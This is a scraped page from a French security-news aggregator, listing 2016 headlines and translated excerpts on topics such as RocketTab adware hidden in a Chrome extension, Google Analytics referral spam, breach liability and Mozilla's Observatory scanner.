2016-12-16T14:00:00+00:00 http://feeds.feedblitz.com/~/244750874/0/alienvault-blogs~Recap-from-the-Alien-Eye-in-the-Sky www.secnews.physaphae.fr/article.php?IdArticle=275836 False None APT 15,Yahoo None

SANS Institute - SANS is a defense and training player
Protecting Powershell Credentials (NOT), (Fri, Dec 2nd)
2016-12-02T14:35:57+00:00 https://isc.sans.edu/diary.html?storyid=21779&rss www.secnews.physaphae.fr/article.php?IdArticle=266294 False None APT 10 None

The State of Security - American Magazine
Amplify IT Security by Integrating Solutions
2016-12-01T04:01:02+00:00 https://www.tripwire.com/state-of-security/security-data-protection/amplify-it-security-by-integrating-solutions/ www.secnews.physaphae.fr/article.php?IdArticle=263487 False None APT 10 None

Hacker Republic - French hacking news site
RocketTab, the persistent adware
Tags: Adware, Malware
Adware is advertising software, unwanted of course. Some software available for free sometimes comes bundled with it. It also grafts itself onto your browser. Beyond forcing advertisements onto every page you visit, advertisements obviously based on your previous browsing, these unwanted programs are occasionally hard to detect because they appear neither in the installed programs, nor in the registry keys, nor in any of the browser extensions. The "program" RocketTab is a magnificent illustration of this.

RocketTab on Chrome

For a few weeks, while browsing in Chrome, I had been seeing an advertising box appear. Having tested a few programs dedicated to Black SEO over the summer, I had attributed its appearance to Jingling, 10k Hits or Hitleap. After a thorough clean-up, the box was no longer there. Then it reappeared.
Having identified that it was RocketTab, I started by looking through my programs to see whether it was present. Nothing on the horizon. I looked in my Chrome extensions. Still nothing. I looked at my registry keys. Nothing again. I ran Avast and AdwCleaner.

AdwCleaner

Nothing. And yet the nasty beast was still there:

RocketTab in my Amazon search

In desperation, I reset Chrome and checked everything in the AppData folder. One last test remained: the Chrome extensions. I disabled all the extensions and ran a search on Amazon, since RocketTab was also polluting my Amazon search. The parasitic box had disappeared. It was while re-enabling a browsing history extension that I found the culprit: History Calendar 2.1.6. This application, found on the official Chrome extension store, had built in a new little feature: permission for advertisements, and the box was checked by default.

History Calendar and RocketTab

Initially, this extension had been checked and approved by Google and this "feature" was not in it. The last update of this extension dates from 19 July 2016 and the application was removed from the official Google Chrome store in mid-September 2016.
Getting rid of RocketTab

As we can see, in my case it was fairly vicious, because I had no reason to be wary of an
2016-11-26T01:17:07+00:00 https://www.hackersrepublic.org/outils/rockettab-ladware-persistant www.secnews.physaphae.fr/article.php?IdArticle=282809 False None APT 15 None

Bleeping Computer - American Magazine
Russian Spammer Uses Fake Google Domain to Tell Webmasters to Vote Trump
2016-11-21T16:35:08+00:00 http://www.bleepingcomputer.com/news/security/russian-spammer-uses-fake-google-domain-to-tell-webmasters-to-vote-trump/ www.secnews.physaphae.fr/article.php?IdArticle=257879 False None APT 19 None

Network World - Info Magazine
Goodbye, NAC. Hello, software-defined perimeter
2016-11-15T07:50:00+00:00 http://www.networkworld.com/article/3141930/security/goodbye-nac-hello-software-defined-perimeter-sdp.html#tk.rss_security www.secnews.physaphae.fr/article.php?IdArticle=254472 False None APT 15 None

Hacker Republic - French hacking news site
Analytics spam
Tags: Spam, Bots, Black SEO
Monitoring your logs is good, but looking at what is going on in your visitor statistics is better. Taking a look at my Google Analytics, I had the great surprise of seeing this in the language category:

Google Analytics spammed by Trump

After a quick search, I discovered that this was a variety of spam: analytics spam.

Analytics spam: why?

This technique, which I file under Black SEO, can also, like traditional spam, be a malware vector. In the case illustrated here, it was mostly an election campaign. The general idea is to pollute the analytics reports of webmasters, community managers, developers, etc. to entice them to visit sites and see in what context their web application is being talked about. It can also be a matter of generating traffic to one's own sites.
Indeed, some portals leave their backlinks and referrers public, thereby improving the spammers' backlinks, hence their reputation and hence their ranking in search results. This is what is called spamindexing.

In short, analytics spam is used to:
- Generate fake traffic;
- Spread malware;
- Boost one's own reputation.

We have seen the why; let us move on to the how.

How does analytics spam work?

When it comes to analytics spam, there are two techniques:
- Bot referral spam;
- Ghost referral spam.

As its name indicates, the first is a bot that really does visit your site, and therefore generates traffic. This technique is simple and everyone knows how to do it. The second is a bit more vicious, because it only concerns sites running Google Analytics: it does not visit your site, but it still leaves a footprint in your statistics, whether through fake referrers, fake languages or fake keywords. But then, how can statistics be polluted without visiting a website? By using a small "flaw" in Google Analytics, which is in reality a feature, a remarkable demonstration of the phrase "it's not a bug, it's a feature". It starts by generating Google Analytics codes. Fake data is then sent via the Google Analytics Measurement Protocol, and that fake data is then recorded in the statistics of the targeted accounts.
2016-11-15T00:49:31+00:00 https://www.hackersrepublic.org/outils/le-spam-analytics www.secnews.physaphae.fr/article.php?IdArticle=282813 False None APT 19 None

Network World - Info Magazine
Your security mirages
I was hit last week. Forensics are in progress. I got doxxed, too.

It has made me realize that most of systems security is an illusion. Here are my favorite alternate realities:

1. Everything is safe behind the firewall.

Ever heard of UBFWI, as in User's Been Fooling With It?
While IDS/IPS and firewall networked technology has improved so vastly, there's nothing like a user with an infected laptop to bring in a lulu.

2. Obscure operating systems never get hit. Hackers only go for the gold with Windows.

Here, let me laugh out loud and roll on the floor. Mine was an obscure server version on an obscure branch of an obscure BSD limb. Listen to the sound of lunch getting eaten: mine. Chomp, chomp, burp.
2016-11-14T11:12:00+00:00 http://www.networkworld.com/article/3141431/security/your-security-mirages.html#tk.rss_security www.secnews.physaphae.fr/article.php?IdArticle=253515 False None APT 15 None

Network World - Info Magazine
Google punishes web backsliders in Chrome
2016-11-10T11:03:00+00:00 http://www.networkworld.com/article/3138891/internet/google-punishes-web-backsliders-in-chrome.html#tk.rss_security www.secnews.physaphae.fr/article.php?IdArticle=251917 False None APT 19 None

The Hacker News - The Hacker News is a hacking news blog (surprising, right?)
Multiple Critical Remotely Exploitable Flaws Discovered in Memcached Caching System
2016-11-02T03:21:37+00:00 http://feedproxy.google.com/~r/TheHackersNews/~3/DEo5yJss7-Y/memcached-hacking.html www.secnews.physaphae.fr/article.php?IdArticle=242973 False None APT 19 None

Network World - Info Magazine
A breach alone means liability
writer and lawyer, brought an interesting turn of events to my attention last week. We need to pay heed: a litigant can have standing in a U.S. Federal breach case where no personal fraud or identity theft has yet occurred.

Usually, a litigant has to have suffered injury: a breach caused them identity theft or other fraudulent activity based upon information released in a security breach.
This means if you're cracked, you can be liable if personally identifiable information is released, exfiltrated, absconded, whatever. It also means that should you believe the axiom that currently most of us are hacked, we're in for a litigious treat.
2016-10-11T04:00:00+00:00 http://www.networkworld.com/article/3128859/security/a-breach-alone-means-liability.html#tk.rss_security www.secnews.physaphae.fr/article.php?IdArticle=190204 False None APT 17 None

UnderNews - French "pirate" news site
WordPress takes the prize for the CMS most targeted by cyberattacks
Security firm Sucuri has just published its Website Hacked Trend Report for the second quarter of 2016, highlighting the impressive record of the WordPress CMS. Of course, the fault lies with negligent webmasters and not with the system itself...
2016-09-28T08:16:27+00:00 http://feedproxy.google.com/~r/undernews/oCmA/~3/zmAsGTv4q5g/wordpress-remporte-la-palme-du-cms-le-plus-vise-par-les-cyberattaques.html www.secnews.physaphae.fr/article.php?IdArticle=137848 False None APT 19 None

AlienVault Blog - AlienVault is a major defense player in IOCs
Free and Commercial Tools to Implement the Center for Internet Security (CIS) Security Controls, Part 17: Data Protection
- Part 1 - we looked at Inventory of Authorized and Unauthorized Devices.
- Part 2 - we looked at Inventory of Authorized and Unauthorized Software.
- Part 3 - we looked at Secure Configurations.
- Part 4 - we looked at Continuous Vulnerability Assessment and Remediation.
- Part 5 - we looked at Malware Defenses.
- Part 6 - we looked at Application Security.
- Part 7 - we looked at Wireless Access Control.
- Part 8/9 - we looked at Data Recovery and Security Training.
- Part 10/11 - we looked at Secure Configurations for Network Devices such as Firewalls, Routers, and Switches and Limitation and Control of Network Ports, Protocols and Services.
- Part 12 - we looked at Controlled Use of Administrative Privileges.
- Part 13 - we looked at Boundary Defense.
- Part 14 - we looked at Maintenance, Monitoring and Analysis of Audit Logs.
- Part 15 - we looked at Controlled Access Based on the Need to Know.
2016-09-13T13:00:00+00:00 http://feeds.feedblitz.com/~/196176696/0/alienvault-blogs~Free-and-Commercial-Tools-to-Implement-the-Center-for-Internet-Security-CIS-Security-Controls-Part-Data-Protection www.secnews.physaphae.fr/article.php?IdArticle=59479 False None APT 17 None

UnderNews - French "pirate" news site
Google Chrome: towards flagging HTTP pages as "not secure"
Google Chrome currently displays a grey informational icon on HTTP sites. But the giant explains on its blog that from early 2017 its browser will warn users who are on a page not protected by HTTPS. When a warning is shown to every visitor of a site, it can be considered a major means of pressure to force webmasters to move their site to HTTPS.
2016-09-11T10:43:41+00:00 http://feedproxy.google.com/~r/undernews/oCmA/~3/d-pJWrduC-g/google-chrome-vers-une-signalisation-des-pages-http-non-securisees.html www.secnews.physaphae.fr/article.php?IdArticle=47810 False None APT 19 None

Network World - Info Magazine
Mozilla launches free website security scanning service
Dubbed Observatory, the tool was initially built for in-house use by Mozilla security engineer April King, who was then encouraged to expand it and make it available to the whole world.

She took inspiration from the SSL Server Test from Qualys' SSL Labs, a widely appreciated scanner that rates a website's SSL/TLS configuration and highlights potential weaknesses.
Like Qualys' scanner, Observatory uses a scoring system from 0 to 100, with the possibility of extra bonus points, which translates into grades from F to A+.
2016-08-26T08:14:40+00:00 http://www.networkworld.com/article/3112331/mozilla-launches-free-website-security-scanning-service.html#tk.rss_security www.secnews.physaphae.fr/article.php?IdArticle=8971 False None APT 19 None